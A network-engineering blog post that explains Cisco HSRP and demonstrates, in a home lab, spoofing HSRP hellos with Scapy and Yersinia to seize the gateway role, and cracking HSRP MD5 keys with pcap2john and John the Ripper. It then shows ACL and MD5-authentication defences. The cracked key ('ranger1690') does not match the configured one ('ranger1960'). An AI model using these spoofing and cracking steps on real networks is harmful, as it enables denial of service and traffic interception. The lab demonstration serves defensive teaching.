Back in the day, the Cisco Press books only covered the Hot Standby Router Protocol (HSRP) topic in the professional-level track. When I did a quick search on CCNA books, I found out that they covered it in CCNA R&S ICND2 200-105 OCG* and the new CCNA 200-301 OCG, Vol 2* books. Both books, however, didn’t cover the security vulnerability of such minimal configuration. Thus, attacking HSRP is possible.
This post contains affiliate links. If you use these links to buy something I may earn a commission. Full disclosure here.
The books only discussed the theory behind it, the reason for using it, and implementation steps. While it’s all right to cover only the essentials, it is no longer sufficient to run HSRP without security because of how easy it is to attack it. In this article, I’m going to demonstrate how to perform an attack HSRP and protect it from such attacks.
In this demo, I used EVE-NG and Kali Linux on my VMware ESXi home lab environment. If you’re looking for a small form factor server, you may want to consider Intel NUC. This NUC is my second one, and I am a fan of it!
What is HSRP?
HSRP is a Cisco proprietary protocol released around 1998, at least the RFC. It is one of the First Hop Redundancy Protocol (FHRP) supported in Cisco routers and Layer 3 capable switches. Cisco designed the protocol to provide a mechanism for the routers or switches to establish a fault-tolerant default gateway.
In essence, the devices work in concert to provide an illusion of a single default gateway to the hosts within the LAN. In turn, it allows for some fault scenarios and still not lose connectivity to the default gateway.
How does it work?
Note
This section does not cover everything there is to know about the operations of HSRP. For more information, read the RFC 2281.
It is crucial to understand the fundamental operations of HSRP. Understanding how it works is the key to recognizing the protocol’s vulnerability.
A set of HSRP-capable devices that work together are known as an HSRP group or standby group. A single router in a standby group is elected to be responsible for forwarding traffic destined to the default gateway. This router is known as an active router.
Another router will act as the backup router known as a standby router. If the active router fails, the standby router will become the active router.
These HSRP-enabled devices exchange information between each other using hello packets. Both the active and standby routers send the hello messages to the destination multicast address 224.0.0.2 on UDP 1985.
Within a hello packet, there is a field called priority. HSRP uses this field to elect the active and standby routers. A router with the highest priority wins the election. By default, all routers use 100 as their priority. If there is a tie in priority values, the router with the highest IP address configured wins the election.
Configuration and packet capture
Now that you’re familiar with HSRP’s operations, it’s time to look at the basic configuration and the contents of a hello packet. In this demo, I have two routers, one switch, and two computers.
Without further ado, I used the following configuration for both routers.
interface GigabitEthernet0/0 ip address 10.0.0.2 255.255.255.0 standby 1 ip 10.0.0.1 standby 1 priority 120 standby 1 preempt
interface GigabitEthernet0/0 ip address 10.0.0.3 255.255.255.0 standby 1 ip 10.0.0.1 standby 1 priority 100 standby 1 preempt
Once the routers see each other’s HSRP messages, R1 will take over as the active router. In the packet capture, it shows both hello packets of R1 and R2 after the election process.
You will notice that both routers automatically set authentication data to cisco. By default, Cisco IOS includes this key to authenticate routers that participate in HSRP.
Vulnerability
If you stop and think about the basic operations of HSRP, you will be able to recognize its weakness. In essence, any HSRP-capable device can advertise a high priority value and take over as the active router.
The device can be a legitimate router or a malicious actor wanting to issue a denial of service (DoS) or man-in-the-middle (MITM) attack. As a network professional, it falls under our responsibility to ensure network reliability and protect network devices from attacks.
Exploitation
Now that you are aware of HSRP’s basic operations and vulnerability, you can apply that knowledge to exploit its weakness. There are two open-source software tools that you can use to perform a DoS attack: Scapy and Yersinia. With the help of these tools, attacking HSRP makes it easy for anyone to do.
Scapy
In this section, I’m going to demonstrate how easy it is to attack HSRP with the use of Scapy. In this demo, I’m using Kali Linux with a lot of packages installed. You may need to install the software if you get an error.
I used these parameters below to perform the attack.
networkjutsu@kali:~$ sudo scapy >>> ip = IP(src='11.11.11.11',dst='224.0.0.2') >>> udp = UDP(sport=1985,dport=1985) >>> hsrp = HSRP(group=1,priority=255,virtualIP='10.0.0.1') >>> send(ip/udp/hsrp,inter=3,loop=1) .....^C Sent 5 packets.
Alternatively, you can write the syntax like the one below.
networkjutsu@kali:~$ sudo scapy >>> send(IP(src='11.11.11.11',dst='224.0.0.2')/UDP(sport=1985,dport=1985)/HSRP(group=1,priority=255,virtualIP='10.0.0.1'),inter=3,loop=1) .....^C Sent 5 packets.
I think the parameters are self-explanatory except for two: inter and loop. The inter parameter means interval in seconds. Since I set it to 3, Scapy will send the packets every 3 seconds. The loop parameter instructs Scapy to keep sending the same message until I stop it.
Once the routers see packets that I crafted using Scapy, their HSRP states will change, as shown below.
R1#
*Aug 15 20:58:44.595: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Active -> Speak
*Aug 15 20:58:55.826: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Speak -> Standby
R1#show standby brief
P indicates configured to preempt.
|
Interface Grp Pri P State Active Standby Virtual IP
Gi0/0 1 120 P Standby 11.11.11.11 local 10.0.0.1R2#
*Aug 15 20:58:43.488: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Standby -> Listen
R2#show standby brief
P indicates configured to preempt.
|
Interface Grp Pri P State Active Standby Virtual IP
Gi0/0 1 100 Listen 11.11.11.11 10.0.0.2 10.0.0.1Alice> ping 8.8.8.8 -t 84 bytes from 8.8.8.8 icmp_seq=1 ttl=116 time=7.719 ms 84 bytes from 8.8.8.8 icmp_seq=2 ttl=116 time=6.688 ms 84 bytes from 8.8.8.8 icmp_seq=3 ttl=116 time=7.091 ms 84 bytes from 8.8.8.8 icmp_seq=4 ttl=116 time=7.666 ms 84 bytes from 8.8.8.8 icmp_seq=5 ttl=116 time=7.853 ms 84 bytes from 8.8.8.8 icmp_seq=6 ttl=116 time=7.859 ms 8.8.8.8 icmp_seq=7 timeout 8.8.8.8 icmp_seq=8 timeout 8.8.8.8 icmp_seq=9 timeout 8.8.8.8 icmp_seq=10 timeout 8.8.8.8 icmp_seq=11 timeout
The screenshot below is the packet capture during the attack.
If you look at frame #6, that’s when Scapy first sent the crafted HSRP message.
Shortly after seeing the crafted HSRP message, R1 sends a resign message (frame #8). This message means that R1 no longer wishes to be the active router.
Next, the R2 sends a message (frame #9) with a listen state. Yes, Wireshark displays it as passive, but if you read RFC 2281, there is no passive state.
Yersinia
For folks that prefer GUI-based, you can use the Yersinia tool to launch the attack. As with the previous section, I’m using Kali Linux in this demo. You may need to install the software if you get an error.
To launch the Yersinia GUI, type the command sudo yersinia -G in the terminal application. When you start Yersinia, you may see a warning message stating that the GUI is an alpha version. Click the OK button to exit out of the warning message.
To start an HSRP attack, select the Launch attack button, and a new window will appear.
In the Choose protocol attack window, select the HSRP tab. Then, select the becoming ACTIVE router radio button, and select the OK button. A new window will appear.
I tried the other options, but they didn’t work for me. Your mileage may vary.
In the HSRP attack parameters window, enter the source IP that you want. To remain consistent throughout the demo, I will use the same IP address. Once you entered the IP address, select the OK button.
As you can see, the HSRP message that the Yersinia tool sent out is different than what we crafted using Scapy. The software sent out a coup message instead of a hello message. You can technically do the same thing with Scapy by adding opcode=1 in the HSRP parameter. Either way, both software successfully launched the attack and took over the active router role.
Another difference is the source MAC address that the Yersinia tool uses for the attack. With Scapy, it uses the MAC address of the NIC or vNIC. I tried crafting it using a different source MAC address, but the attack wasn’t successful.
Protection
Defending from HSRP attacks is quite an easy process. It’s surprising how many HSRP-enabled interfaces I’ve seen that do not have security configuration. The network engineers may view it as low threat compared to how information security professionals may view it. It is no secret that these two camps have different opinions with regards to security. But, I digress.
Access Control List (ACL)
One might think that an ACL is enough to protect from an HSRP attack. However, as you have seen, it’s easy enough to spoof the source IP address. To demonstrate that this isn’t successful in thwarting such an attack, I configured an ACL on both routers.
ip access-list extended HSRP permit udp 10.0.0.0 0.0.0.3 eq 1985 host 224.0.0.2 eq 1985 deny udp any eq 1985 any eq 1985 permit ip any any interface GigabitEthernet0/0 ip access-group HSRP in
As you can see, I limited the routers to accept HSRP messages only from the 10.0.0.0/30 range. If it receives any HSRP packets from outside this range, then the traffic is dropped. The output below shows that 12 packets matching the deny filter. That’s when I attempted to send crafted HSRP messages using a source IP address of 11.11.11.11.
R1#show ip access-list HSRP
Extended IP access list HSRP
10 permit udp 10.0.0.0 0.0.0.3 eq 1985 host 224.0.0.2 eq 1985 (603 matches)
20 deny udp any eq 1985 any eq 1985 (12 matches)
30 permit ip any any (730 matches)While the ACL is successful in thwarting the HSRP attack, it’s not, however, enough to protect from such an attack. Let’s use Scapy to spoof the IP of the R2 as the source.
networkjutsu@kali:~$ sudo scapy >>> ip = IP(src='10.0.0.3',dst='224.0.0.2') >>> udp = UDP(sport=1985,dport=1985) >>> hsrp = HSRP(group=1,priority=255,virtualIP='10.0.0.1') >>> send(ip/udp/hsrp,inter=3,count=20)
Alice> ping 8.8.8.8 -t 84 bytes from 8.8.8.8 icmp_seq=1 ttl=116 time=7.719 ms 84 bytes from 8.8.8.8 icmp_seq=2 ttl=116 time=6.688 ms 84 bytes from 8.8.8.8 icmp_seq=3 ttl=116 time=7.091 ms 84 bytes from 8.8.8.8 icmp_seq=4 ttl=116 time=7.666 ms 84 bytes from 8.8.8.8 icmp_seq=5 ttl=116 time=7.853 ms 84 bytes from 8.8.8.8 icmp_seq=6 ttl=116 time=7.859 ms 8.8.8.8 icmp_seq=7 timeout 8.8.8.8 icmp_seq=8 timeout 8.8.8.8 icmp_seq=9 timeout 8.8.8.8 icmp_seq=10 timeout 8.8.8.8 icmp_seq=11 timeout
Aug 16 20:50:41.061: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Standby -> Active
*Aug 16 20:51:15.457: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Active -> Speak
*Aug 16 20:51:15.479: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Speak -> Active
*Aug 16 20:51:18.458: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Active -> Speak
*Aug 16 20:51:28.828: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Speak -> Standby
R1#sh standby
GigabitEthernet0/0 - Group 1
State is Standby
78 state changes, last state change 00:00:51
Virtual IP address is 10.0.0.1
Active virtual MAC address is 000c.29dd.94c3
Local virtual MAC address is 0000.0c07.ac01 (v1 default)
Hello time 3 sec, hold time 10 sec
Next hello sent in 2.048 secs
Preemption enabled
Active router is 10.0.0.3, priority 255 (expires in 3.456 sec)
Standby router is local
Priority 120 (configured 120)
Group name is "hsrp-Gi0/0-1" (default)*Aug 16 20:51:15.891: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Standby -> Active
*Aug 16 20:51:15.911: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Active -> Speak
R2#sho standby
GigabitEthernet0/0 - Group 1
State is Listen
14 state changes, last state change 00:00:13
Virtual IP address is 10.0.0.1
Active virtual MAC address is unknown
Local virtual MAC address is 0000.0c07.ac01 (v1 default)
Hello time 3 sec, hold time 10 sec
Preemption disabled
Active router is unknown
Standby router is 10.0.0.2, priority 120 (expires in 9.520 sec)
Priority 100 (default 100)
Group name is "hsrp-Gi0/0-1" (default)As you can see from the R1 and R2 output, I was able to launch a successful DoS attack on the HSRP group.
Authentication
Using the authentication data field is the right solution to remediate this security vulnerability. As demonstrated, we must not use the cleartext option since it’s quite easy to sniff this information.
Cisco IOS supports two ways of adding MD5 authentication to HSRP: key chain and key string. The advantage of using the key-chain method is that you can rotate the keys without breaking the HSRP communication between two devices.
| Related: Securing Cisco IOS passwords |
While the key-chain method allows you to change the cryptographic authentication algorithm, it doesn’t seem to have any effect. When I captured the packets and grabbed the hash value, the hash-identifier tool still recognized it as MD5 or MD4.
Without further ado, here are the two methods on how to add MD5 authentication to HSRP.
key chain HSRP key 1 key-string ranger1960 ! interface GigabitEthernet0/0 standby 1 authentication md5 key-chain HSRP
interface GigabitEthernet0/0 standby 1 authentication md5 key-string ranger1960
Authentication attack
I was curious if I can attack HSRP’s authentication without cracking the hash. So, I decided to capture the packets on the wire and copy the hash value. I then decided to use Scapy to craft an HSRP packet using the hash value from the packet capture.
networkjutsu@kali$ sudo scapy >>> ip = IP(src='11.11.11.11',dst='224.0.0.2') >>> udp = UDP(sport=1985,dport=1985) >>> hsrp = HSRP(group=1,priority=255,virtualIP='10.0.0.1',auth=b'x00\x00\x00\x00\x00\x00\x00\x00') >>> md5 = HSRPmd5(type=4,len=28,algo=1,padding=0,flags=0,sourceip='10.0.0.3',keyid=0,authdigest=b'\xa6\xb9\x55\x4a\xd2\x31\x62\xd8\x9b\x2d\x6b\x9e\xf3\x5f\x25\x76') >>> send(ip/udp/hsrp/md5,inter=3,count=10)
*Aug 19 01:40:50.183: %HSRP-4-BADAUTH: Bad authentication from 11.11.11.11, group 1, remote state Active R1#
*Aug 19 01:40:54.319: %HSRP-4-BADAUTH: Bad authentication from 11.11.11.11, group 1, remote state Active R2#
As you can see, both the R1 and R2 reported that the crafted packet doesn’t match the HSRP key set on both routers. It seems that it is not vulnerable to pass the hash kind of attack.
While I couldn’t take the pass the hash attack kind of approach, MD5 is not immune to attacks. As you may be aware, MD5 is susceptible to collision attacks. Furthermore, there are other types of attacks, as described in this paper. A highly motivated attacker could theoretically perform these attacks.
Brute force attack
As with any hash, MD5 is susceptible to brute force attacks. That said, it is vital to use a strong enough key for authentication to avoid dictionary-based attacks.
I purposefully set the weak key string so that I can demonstrate how easy it is to launch a dictionary attack. Kali Linux has a wordlist that either hashcat or John the Ripper can use.
The rockyou.txt wordlist included in my installation is quite popular, but it’s not a very big list (134 MB). Other wordlists out there are quite massive. For example, crackstation.net uses a wordlist that amounts to a 15 GB uncompressed text file.
Cracking software
In this demo, I’m going to use one of the popular cracking software tools called John the Ripper (JtR). Depending on the packages that you selected during the Kali Linux installation process, you may not need to install it.
Packet capture
Before you can leverage John the Ripper (JtR), you will need to capture HSRP traffic and save it as a PCAP file. By default, Wireshark saves the file as PCAP Next Generation Dump File format, so make sure to select the right one when saving.
Install packages
Furthermore, you will need to install some software packages before using the software. These packages are required to extract the necessary fields for JtR to crack the hash.
networkjutsu@kali:~$ sudo apt install python-pip -y networkjutsu@kali:~$ sudo pip install wheel networkjutsu@kali:~$ sudo pip install scapy networkjutsu@kali:~$ sudo pip install --user dpkt
| Are you having issues installing the packages? Check this post out. |
Hash value extraction
Once completed, run the pcap2john.py script against the PCAP file. For each HSRP packets, you will get one hash value. Copy and save the hash value to a text file.
networkjutsu@kali:~$ sudo /usr/share/john/pcap2john.py md5.pcap $hsrp$000010030a78010000000000000000000a000001041c010000000a0000020000000000000000000000000000000000000000$a6b9554ad23162d89b2d6b9ef35f2576 $hsrp$000008030a64010000000000000000000a000001041c010000000a0000030000000000000000000000000000000000000000$132833140773d3f3108bfdaa4091a439
Cracking the hash
Now that we have the hash value, it’s time to get cracking (pun intended). In this demo, I stored the hash value in a file called md5.txt.
networkjutsu@kali:~$ sudo john --format=hsrp Desktop/md5.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (hsrp, "MD5 authentication" HSRP, HSRPv2, VRRP, GLBP [MD5 32/64]) Press 'q' or Ctrl-C to abort, almost any other key for status ranger1690 (?) ranger1690 (?) 2g 0:00:00:00 DONE (2020-08-16 20:10) 200.0g/s 1254Kp/s 2508Kc/s 2508KC/s havana..supreme Warning: passwords printed above might not be all those cracked Use the "--show" option to display all of the cracked passwords reliably Session completed
As you can see, JtR was able to crack the hash value using a wordlist. It is the reason why you should use a key that isn’t in any of a wordlist. The simplest way is to use a built-in tool in Linux or macOS to generate a key. I use the openssl rand -base64 23 to produce a 32-character key.
Final thoughts
As demonstrated, it is easy to protect HSRP from malicious actors. Yet, there are networks out there running HSRP that do not have this security feature turned on.
I think some network engineers do not believe it poses a real threat to bother securing it. It may be because of the other security controls in place that the threat of such an attack is low.
I, however, believe that it doesn’t cause any real operational burden not to include it. Not only it increases your security posture, but it will also make your security department happy that you are reducing vulnerabilities.
You might like to read
Securing Cisco IOS passwords
Securing Cisco IOS SSH server
Optimizing HSRP timers
BUY ME COFFEE ☕
Disclosure
AndrewRoderos.com is a participant of a few referral programs, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to company websites.
